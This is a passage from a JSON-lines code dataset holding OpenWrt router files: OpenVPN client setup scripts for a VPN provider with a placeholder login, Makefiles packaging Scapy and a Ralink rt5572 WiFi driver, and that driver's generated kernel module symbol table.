$(PKG_BUILD_DIR)/driver\nendef\n\ndefine Build/Compile/kmod\n\trm -rf $(PKG_BUILD_DIR)/modules\n\t$(MAKE) $(PKG_JOBS) -C \"$(PKG_BUILD_DIR)\" $(MAKE_OPTS) modules\nendef\n\ndefine Build/Compile\n\t$(call Build/Compile/kmod)\nendef\n\n$(eval $(call KernelPackage,rtl819xc))\n\n"
},
{
"alpha_fraction": 0.6584992408752441,
"alphanum_fraction": 0.6860643029212952,
"avg_line_length": 49.07692337036133,
"blob_id": "be679c9d5baebba3dc03d13f94295581bca6d6cc",
"content_id": "931eedae10a9f67692c6d6a97170893696dd5550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 13,
"path": "/packages/iipr/files/etc/openvpn/up-ibvpn.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nACTION=ifup DEVICE=$2 INTERFACE=vpn /sbin/hotplug-call iface\n \n/sbin/ifconfig $2 $5 netmask $6 mtu $3 # broadcast 23.19.88.255\niptables --table nat --append POSTROUTING --out-interface $2 --jump MASQUERADE\n \n# mv /tmp/resolv.conf /tmp/resolv.conf.bak\n# echo $foreign_option_1 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' > /tmp/resolv.conf\n# echo $foreign_option_2 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n# echo $foreign_option_3 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n \nexit 0\n\n\n"
},
{
"alpha_fraction": 0.6456885933876038,
"alphanum_fraction": 0.66489577293396,
"avg_line_length": 26.494382858276367,
"blob_id": "0c0d3f4062830041904261123804d063213e8850",
"content_id": "c54beefe42b5439fb0b3cee7693c5f22e1a863cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2447,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 89,
"path": "/packages/iipr/files/etc/openvpn/ibvpn_start.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "sleep 5\n\nmkdir /tmp/ibvpn\n\necho \"-----BEGIN CERTIFICATE-----\nMIIDeDCCAuGgAwIBAgIJAMVKgpjMPUfxMA0GCSqGSIb3DQEBBQUAMIGFMQswCQYD\nVQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG\nA1UEChMMRm9ydC1GdW5zdG9uMRgwFgYDVQQDEw9Gb3J0LUZ1bnN0b24gQ0ExITAf\nBgkqhkiG9w0BCQEWEm1lQG15aG9zdC5teWRvbWFpbjAeFw0xMDA3MjExOTU5MzVa\nFw0yMDA3MTgxOTU5MzVaMIGFMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT\nBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UEChMMRm9ydC1GdW5zdG9uMRgwFgYD\nVQQDEw9Gb3J0LUZ1bnN0b24gQ0ExITAfBgkqhkiG9w0BCQEWEm1lQG15aG9zdC5t\neWRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAz23m3BXY5Asiw8Dx\nT4F6feqsp+pIx6ivftTniyUCbSAxI1J1s1x75DzxmUpIwPu5xavzgPXgZr8FT81X\nJGqF9km4AE95iddJawKx0wNgdTo7GximQq9rw0dsQIB5hZZQ9TJwHC3VOnmEic5A\nOawKOCybMcRs8saLakZOgh7Xc+UCAwEAAaOB7TCB6jAdBgNVHQ4EFgQUeRhE2N4l\nXwL4H1dbjkZ4ou6fj3AwgboGA1UdIwSBsjCBr4AUeRhE2N4lXwL4H1dbjkZ4ou6f\nj3ChgYukgYgwgYUxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMM\nU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xGDAWBgNVBAMTD0Zv\ncnQtRnVuc3RvbiBDQTEhMB8GCSqGSIb3DQEJARYSbWVAbXlob3N0Lm15ZG9tYWlu\nggkAxUqCmMw9R/EwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQASt0pl\nWzVseQLTNM8Mlgw4ZnGAv/x2xnijmMqrkE+F7pnaOicGpxgCfMKzjZuJu0TNJqF2\nfibE7GhMdomD4dLFgIu8Wb5E7iQ1CSBEOGumRhK8qCsDzjr7WXUdhqA6Xvo+ylU6\nDMzy0Wn3NNvfGC+qxOgybYCJwDnVPi0CEDSbzQ==\n-----END CERTIFICATE-----\" > /tmp/ibvpn/ibvpn.com.crt\n\necho \"#!/bin/sh\ncase \\\"\\$1\\\" in\n up) export action=\\\"up\\\" ;;\n down) export action=\\\"down\\\" ;;\n *) echo \\\"No action specified.\\\" && exit 1 ;;\nesac\n \nif [ \\\"\\$action\\\" = \\\"up\\\" ]; then\n mv /tmp/resolv.conf /tmp/resolv.conf.bak\n echo \\$foreign_option_1 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' > /tmp/resolv.conf\n echo \\$foreign_option_2 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n echo \\$foreign_option_3 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n iptables --table nat --append POSTROUTING --out-interface \\$2 --jump MASQUERADE\nfi\n\nif [ \\\"\\$action\\\" = \\\"down\\\" ]; then\n mv /tmp/resolv.conf.bak /tmp/resolv.conf\n iptables --table nat --delete POSTROUTING --out-interface \\$2 --jump MASQUERADE\nfi\" > /tmp/ibvpn/change_resolv_conf.sh\n\nchmod 755 /tmp/ibvpn/change_resolv_conf.sh\n\necho \"remote us4.ibvpn.com 1194 udp\nclient\ndev tap\nresolv-retry infinite\nnobind\npersist-key\nmute-replay-warnings\nca /tmp/ibvpn/ibvpn.com.crt\nlog-append /tmp/ibvpn/vpn.log\ncomp-lzo\nverb 3\nmute 20\nns-cert-type server\nfragment 1300\nroute-method exe\nroute-delay 2\nauth-user-pass /tmp/ibvpn/user.conf\nauth-retry nointeract\nreneg-sec 0\nscript-security 3 system\nup \\\"/tmp/ibvpn/change_resolv_conf.sh up\\\"\ndown \\\"/tmp/ibvpn/change_resolv_conf.sh down\\\"\" > /tmp/ibvpn/server.ovpn\n\necho \"#!/bin/sh\nif [ \\$(ps | grep openvpn | grep -v grep | wc -l | tr -s \\\"\\n\\\") -eq 0 ];\nthen openvpn --daemon --config /tmp/ibvpn/server.ovpn;\nfi\" > /tmp/ibvpn/check_vpn\n\nchmod 755 /tmp/ibvpn/check_vpn\n\necho \"#!/bin/sh\ncase \\$1 in\n \\\"start\\\" )\n ntpclient pool.ntp.org\n killall openvpn\n echo \\\"Launching OpenVPN process\\\"\n sed -i 's/remote.*/remote '\\$2' 1194 udp/g' /tmp/ibvpn/server.ovpn\n openvpn --daemon --config /tmp/ibvpn/server.ovpn\n sleep 10\n if [ \\$(route -n | grep '0.0.0.0.*tap' | wc -l) = 2 ]; then\n echo \"VPN ON\"\n else\n echo \"VPN Error\"\n fi\n echo \\\"* * * * * root /tmp/ibvpn/check_vpn\\\" > /tmp/crontab\n stopservice cron && startservice 
cron\n;;\n \\\"stop\\\" )\n echo \\\"Stoping OpenVPN Process\\\"\n sed -i 's/.*check_vpn.*//' /tmp/crontab\n stopservice cron && startservice cron\n killall openvpn\n;;\nesac\nreturn 0\" > /tmp/ibvpn/vpn\n\nchmod 755 /tmp/ibvpn/vpn\n\necho \"[email protected]\nVpnPassword\" > /tmp/ibvpn/user.conf\n"
},
{
"alpha_fraction": 0.6840579509735107,
"alphanum_fraction": 0.7115942239761353,
"avg_line_length": 24.07272720336914,
"blob_id": "7368312b2da3a9602d1dfa23fe92024c44493404",
"content_id": "2687742d7a200ea61f4a7315bcad2e5e10fb6917",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 55,
"path": "/packages/python-scapy/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=scapy\nPKG_VERSION:=2.2.0\n#PKG_RELEASE:=dev\n\nPKG_SOURCE:=scapy-$(PKG_VERSION)-dev.tar.gz\nPKG_SOURCE_URL:=https://pypi.python.org/packages/source/s/scapy/\nPKG_MD5SUM:=1a5115d1f33548501d01d735bd689f13\n\nPKG_BUILD_DIR:=$(BUILD_DIR)/$(PKG_NAME)-$(PKG_VERSION)-dev\nPKG_BUILD_DEPENDS:=python\n\ninclude $(INCLUDE_DIR)/package.mk\n$(call include_mk, python-package.mk)\n\ndefine Package/python-scapy\n SUBMENU:=Python\n SECTION:=lang\n CATEGORY:=Languages\n TITLE:=python-scapy\n URL:=http://www.secdev.org/projects/scapy/\n DEPENDS:=+python +libpcap +libdnet +pypcap\n MAINTAINER:[email protected]\nendef\n\ndefine Package/python-scapy/description\n Scapy is a powerful interactive packet manipulation program.\nendef\n\ndefine Build/Compile\n\t$(INSTALL_DIR) $(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t\t$(PKG_BUILD_DIR)/scapy \\\n \t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\nendef\n\ndefine Package/python-scapy/install\n\t$(INSTALL_DIR) $(1)$(PYTHON_PKG_DIR)\n\t$(INSTALL_DIR) $(1)/bin\n\t$(INSTALL_BIN) $(PKG_BUILD_DIR)/bin/scapy $(1)/bin/\n\t$(INSTALL_BIN) $(PKG_BUILD_DIR)/bin/UTscapy $(1)/bin/\n\t$(CP) \\\n\t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)/scapy \\\n\t\t$(1)$(PYTHON_PKG_DIR)\nendef\n\n$(eval $(call BuildPackage,python-scapy))\n\n"
},
{
"alpha_fraction": 0.6811857223510742,
"alphanum_fraction": 0.7320024371147156,
"avg_line_length": 26.53333282470703,
"blob_id": "3e46dda6b43700b2e650ec89fc590aabcbc21c46",
"content_id": "10294caaa411b7e01451f4cd3497d9be8f8869ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 359,
"num_lines": 60,
"path": "/packages/rt5572/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\ninclude $(INCLUDE_DIR)/kernel.mk\n\nPKG_NAME:=rt5572\nPKG_VERSION:=2.6.1\nPKG_RELEASE:=3\n\nPKG_BUILD_PARALLEL:=1\n\ninclude $(INCLUDE_DIR)/package.mk\n\ndefine KernelPackage/rt5572\n SUBMENU:=Wireless Drivers\n TITLE:=Ralink rt5572 WiFi\n FILES:= \\\n\t$(PKG_BUILD_DIR)/RT2870STA.dat \\\n\t$(PKG_BUILD_DIR)/os/linux/rt5572sta.ko\n MAINTAINER:[email protected]\n AUTOLOAD:=$(call AutoLoad,50, rt5572)\nendef\n\ndefine KernelPackage/rt5572/description\n Driver for Ralink rt5572 wireless devices.\nendef\n\nWFLAGS=-DRTMP_MAC_USB -DRT30xx -DRT33xx -DRT3070 -DRT3370 -DRT5370 -DRTMP_USB_SUPPORT -DRTMP_TIMER_TASK_SUPPORT -DRTMP_RF_RW_SUPPORT -DRTMP_EFUSE_SUPPORT -DRTMP_INTERNAL_TX_ALC -DRTMP_FREQ_CALIBRATION_SUPPORT -DVCORECAL_SUPPORT -DIQ_CAL_SUPPORT -DRTMP_TEMPERATURE_COMPENSATION -DDOT11_N_SUPPORT -DCONFIG_RA_NAT_NONE -DDBG -DA_BAND_SUPPORT -DCONFIG_STA_SUPPORT\n\n#-DEXT_BUILD_CHANNEL_LIST\n\nMAKE_OPTS:= \\\n\tARCH=\"$(LINUX_KARCH)\" \\\n\tCROSS_COMPILE=\"$(TARGET_CROSS)\" \\\n\tEXTRA_CFLAGS=\"-DCONFIG_LITTLE_ENDIAN -I$(PKG_BUILD_DIR)/include -DLINUX -DCONFIG_STA_SUPPORT $(WFLAGS)\" \\\n\tLINUX_SRC=$(LINUX_DIR) \\\n\tKSRC=$(LINUX_DIR)\n\ndefine Build/Prepare\n\tmkdir -p $(PKG_BUILD_DIR)\n\t$(CP) ./src/* $(PKG_BUILD_DIR)/\n\t$(Build/Patch)\nendef\n\ndefine Build/Compile\n\t$(MAKE) $(PKG_JOBS) -C $(PKG_BUILD_DIR) $(MAKE_OPTS)\n\nendef\n\ndefine KernelPackage/rt5572/install\n\tmkdir -p $(1)/etc/Wireless/RT2870STA/\n\t$(INSTALL_DATA) $(PKG_BUILD_DIR)/RT2870STA.dat $(1)/etc/Wireless/RT2870STA/\nendef\n\n$(eval $(call KernelPackage,rt5572))\n\n"
},
{
"alpha_fraction": 0.5676993131637573,
"alphanum_fraction": 0.6977567076683044,
"avg_line_length": 43.5773811340332,
"blob_id": "c4bd260f35feff552a7d4ad337ae348afe144620",
"content_id": "cd7e4c99af6aca25c7ffd12b3a88b4a207353551",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 14978,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 336,
"path": "/packages/rt5572/src/os/linux/rt5572sta.mod.c",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#include <linux/module.h>\n#include <linux/vermagic.h>\n#include <linux/compiler.h>\n\nMODULE_INFO(vermagic, VERMAGIC_STRING);\n\nstruct module __this_module\n__attribute__((section(\".gnu.linkonce.this_module\"))) = {\n\t.name = KBUILD_MODNAME,\n\t.init = init_module,\n#ifdef CONFIG_MODULE_UNLOAD\n\t.exit = cleanup_module,\n#endif\n\t.arch = MODULE_ARCH_INIT,\n};\n\nstatic const struct modversion_info ____versions[]\n__used\n__attribute__((section(\"__versions\"))) = {\n\t{ 0xa8c16cf3, \"module_layout\" },\n\t{ 0x3defeb5e, \"register_netdevice\" },\n\t{ 0x9a1dfd65, \"strpbrk\" },\n\t{ 0xd2b09ce5, \"__kmalloc\" },\n\t{ 0xf9a482f9, \"msleep\" },\n\t{ 0x4c4fef19, \"kernel_stack\" },\n\t{ 0xd6ee688f, \"vmalloc\" },\n\t{ 0x349cba85, \"strchr\" },\n\t{ 0x754d539c, \"strlen\" },\n\t{ 0xc29bf967, \"strspn\" },\n\t{ 0xc5ac94d0, \"dev_set_drvdata\" },\n\t{ 0xc8b57c27, \"autoremove_wake_function\" },\n\t{ 0xb5dcab5b, \"remove_wait_queue\" },\n\t{ 0xc7a4fbed, \"rtnl_lock\" },\n\t{ 0x47939e0d, \"__tasklet_hi_schedule\" },\n\t{ 0xb10d2a48, \"netif_carrier_on\" },\n\t{ 0x1637ff0f, \"_raw_spin_lock_bh\" },\n\t{ 0xae68c5b2, \"skb_clone\" },\n\t{ 0x4579655a, \"dev_get_by_name\" },\n\t{ 0xf22449ae, \"down_interruptible\" },\n\t{ 0xbf2ae0f, \"netif_carrier_off\" },\n\t{ 0xc1e2a8ff, \"usb_kill_urb\" },\n\t{ 0xbeb83495, \"filp_close\" },\n\t{ 0xeae3dfd6, \"__const_udelay\" },\n\t{ 0xfb0e29f, \"init_timer_key\" },\n\t{ 0x85df9b6c, \"strsep\" },\n\t{ 0x999e8297, \"vfree\" },\n\t{ 0x91715312, \"sprintf\" },\n\t{ 0x3bcbbb33, \"kthread_create_on_node\" },\n\t{ 0x7d11c268, \"jiffies\" },\n\t{ 0xe43f6a80, \"skb_trim\" },\n\t{ 0xe2d5255a, \"strcmp\" },\n\t{ 0xbe2ed7d2, \"__netdev_alloc_skb\" },\n\t{ 0x27f2852, \"netif_rx\" },\n\t{ 0xf432dd3d, \"__init_waitqueue_head\" },\n\t{ 0x4f8b5ddb, \"_copy_to_user\" },\n\t{ 0xffd5a395, \"default_wake_function\" },\n\t{ 0x35b6b772, \"param_ops_charp\" },\n\t{ 0xd5f2172f, \"del_timer_sync\" },\n\t{ 0xfb578fc5, \"memset\" },\n\t{ 0x11089ac7, \"_ctype\" },\n\t{ 0x8f64aa4, \"_raw_spin_unlock_irqrestore\" },\n\t{ 0x571ab46f, \"current_task\" },\n\t{ 0xf147ecb1, \"down_trylock\" },\n\t{ 0x562b9321, \"usb_deregister\" },\n\t{ 0x27e1a049, \"printk\" },\n\t{ 0x20c55ae0, \"sscanf\" },\n\t{ 0xda2d560c, \"kthread_stop\" },\n\t{ 0x449ad0a7, \"memcmp\" },\n\t{ 0x6b3c99ec, \"free_netdev\" },\n\t{ 0xa1c76e0a, \"_cond_resched\" },\n\t{ 0x9166fada, \"strncpy\" },\n\t{ 0x3dffe1a5, \"register_netdev\" },\n\t{ 0xb4390f9a, \"mcount\" },\n\t{ 0x60b71cbb, \"wireless_send_event\" },\n\t{ 0xab394b6d, \"usb_control_msg\" },\n\t{ 0x16305289, \"warn_slowpath_null\" },\n\t{ 0x848dad9c, \"skb_push\" },\n\t{ 0x72834cac, \"dev_close\" },\n\t{ 0x9545af6d, \"tasklet_init\" },\n\t{ 0x8834396c, \"mod_timer\" },\n\t{ 0xbe2c0274, \"add_timer\" },\n\t{ 0xac28405, \"skb_pull\" },\n\t{ 0xbc3d2398, \"usb_free_coherent\" },\n\t{ 0x8f96f86d, \"dev_kfree_skb_any\" },\n\t{ 0x61651be, \"strcat\" },\n\t{ 0x82072614, \"tasklet_kill\" },\n\t{ 0xf91e5126, \"module_put\" },\n\t{ 0xcbf1ca89, \"skb_copy_expand\" },\n\t{ 0x8537b91d, \"netif_device_attach\" },\n\t{ 0x29e696a8, \"usb_submit_urb\" },\n\t{ 0xeaa9098a, \"netif_device_detach\" },\n\t{ 0x550dae9a, \"usb_get_dev\" },\n\t{ 0xba63339c, \"_raw_spin_unlock_bh\" },\n\t{ 0xf0fdf6cb, \"__stack_chk_fail\" },\n\t{ 0x8717c670, \"usb_put_dev\" },\n\t{ 0xd62c833f, \"schedule_timeout\" },\n\t{ 0x1000e51, \"schedule\" },\n\t{ 0xf5373238, \"eth_type_trans\" },\n\t{ 0x939708e0, \"wake_up_process\" },\n\t{ 0xe048dad7, \"pskb_expand_head\" },\n\t{ 0x9327f5ce, 
\"_raw_spin_lock_irqsave\" },\n\t{ 0x5365b016, \"unregister_netdevice_queue\" },\n\t{ 0xcf21d241, \"__wake_up\" },\n\t{ 0xd2965f6f, \"kthread_should_stop\" },\n\t{ 0x5860aad4, \"add_wait_queue\" },\n\t{ 0x37a0cba, \"kfree\" },\n\t{ 0x69acdf38, \"memcpy\" },\n\t{ 0x801678, \"flush_scheduled_work\" },\n\t{ 0x5c8b5ce8, \"prepare_to_wait\" },\n\t{ 0x71e3cecb, \"up\" },\n\t{ 0xdeb87602, \"usb_register_driver\" },\n\t{ 0xfa66f77c, \"finish_wait\" },\n\t{ 0xf72b1067, \"unregister_netdev\" },\n\t{ 0xb742fd7, \"simple_strtol\" },\n\t{ 0x28318305, \"snprintf\" },\n\t{ 0x2e10cca7, \"__netif_schedule\" },\n\t{ 0xb0e602eb, \"memmove\" },\n\t{ 0x30d8c27b, \"usb_alloc_coherent\" },\n\t{ 0xb9b3502f, \"skb_put\" },\n\t{ 0x4f6b400b, \"_copy_from_user\" },\n\t{ 0x70c55916, \"dev_get_drvdata\" },\n\t{ 0x316eae64, \"usb_free_urb\" },\n\t{ 0x6e720ff2, \"rtnl_unlock\" },\n\t{ 0x9e7d6bd0, \"__udelay\" },\n\t{ 0xfed54737, \"try_module_get\" },\n\t{ 0xb93b2d19, \"usb_alloc_urb\" },\n\t{ 0xe914e41e, \"strcpy\" },\n\t{ 0xfd306865, \"filp_open\" },\n\t{ 0x20ac9778, \"alloc_etherdev_mqs\" },\n};\n\nstatic const char __module_depends[]\n__used\n__attribute__((section(\".modinfo\"))) =\n\"depends=\";\n\nMODULE_ALIAS(\"usb:v148Fp2770d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp2870d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p2870d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p2770d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0039d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p003Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap7512d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0162d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0163d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0164d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v177Fp0302d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1731d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1732d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1742d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0017d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p002Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p002Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p002Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C06d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C28d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019pED06d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C09d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C11d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C07d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp8053d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C23d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C27d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07AAp002Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07AAp003Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07AAp003Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1044p800Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v15A9p0006d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApB522d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA618d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap8522d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap7522d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0CDEp0022d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p3416d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0CDEp0025d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9701d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9702d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p20
0Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C25d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3247d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap6618d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v15C5p0008d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0E66p0001d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0E66p0003d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v129Bp1828d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v157Ep300Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp805Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp815Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1482p3C09d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C09d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04E8p2018d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0740d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0280d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0282d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7718d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7717d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1737p0070d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1737p0071d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0411p00E8d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp815Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v100Dp9031d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p6899d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3070d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3071d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3072d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3820d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p871Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p822Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p871Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p822Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p003Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0042d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0048d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0047d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p005Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C12d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v18C5p0012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap7511d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA701d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA702d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9703d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9705d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9706d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9707d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9708d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9709d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3273d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3305d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1044p800Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019pAB25d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019p5201d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p3070d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p3071d*dc*